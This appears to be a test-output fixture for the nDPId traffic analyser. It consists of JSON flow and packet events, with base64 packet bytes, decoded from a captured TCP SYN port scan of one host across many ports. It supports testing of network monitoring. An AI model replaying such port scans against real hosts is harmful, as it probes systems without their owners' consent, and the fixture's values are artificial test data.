-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEAAAC4GejKsEAAIQA2GNIzSBSrdUoMYAAAAAGACDAAnZQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFkAADUGaxmsEAAIQA2GNIzSAAPdUoMYAAAAAGACCAAwjAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHIAACYGXgCsEAAIQA2GNIzSBuHdUoMYAAAAAGACDAAlrgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsDk0AACcGEyasEAAIQA2GNIzSKUbdUoMYAAAAAGACEAD\/SAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsp10AAC8GchWsEAAIQA2GNIzSBJHdUoMYAAAAAGACEAAj\/gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsnbsAADAGeresEAAIQA2GNIzSJATdUoMYAAAAAGACBAAQiwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ54AAC0G89SsEAAIQA2GNIzTA+fdU4MZAAAAAGACCAAspQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsac0AADIGrKWsEAAIQA2GNIzTBEDdU4MZAAAAAGACDAAoTAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs1CgAADgGPEqsEAAIQA2GNIzTDb3dU4MZAAAAAGACBAAmzwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzTH1XdU4MZAAAAAGACDAANNwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMpkAADcG3tmsEAAIQA2GNIzTFmLdU4MZAAAAAGACEAASKgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAswBUAADIGVl2sEAAIQA2GNIzTF4ndU4MZAAAAAGACDAAVAwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0kAACoGWymsEAAIQA2GNIzTAdDdU4MZAAAAAGACDAAqvAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsLY8AADMG5+OsEAAIQA2GNIzTB93dU4MZAAAAAGACEAAgrwAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs8DEAACsGLUGsEAAIQA2GNIzTAAfdU4MZAAAAAGACEAAohQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrwAADUGlLasEAAIQA2GNIzTJ2LdU4MZAAAAAGACCAAJKgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGYAACYGygysEAAIQA2GNIzTiqzdU4MZAAAAAGACDACh3wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV4AACoGlRSsEAAIQA2GNIzTJXvdU4MZAAAAAGACDAAHEQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsgV0AADcGkBWsEAAIQA2GNIzTBOvdU4MZAAAAAGACEAAjoQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsCGAAACgGGBOsEAAIQA2GNIzTgAjdU4MZAAAAAGACBAC0gwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsAjcAADUGETysEAAIQA2GNIzTBCndU4MZAAAAAGACCAAsYwAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275059407,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjN09N4eJ3FKCGVAUAACM+wAAAAAAAAAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059408,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059408,"pkt":"ACYLMQczACWzv5HuCABFAAAsOWsAAC4G4QesEAAIQA2GNIzSANTdUoMYAAAAAGACDAAruwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMW0AACoG7QWsEAAIQA2GNIzS\/mndUoMYAAAAAGACDAAuJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzIAADsG3kCsEAAIQA2GNIzSBKHdUoMYAAAAAGACEAAj7gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 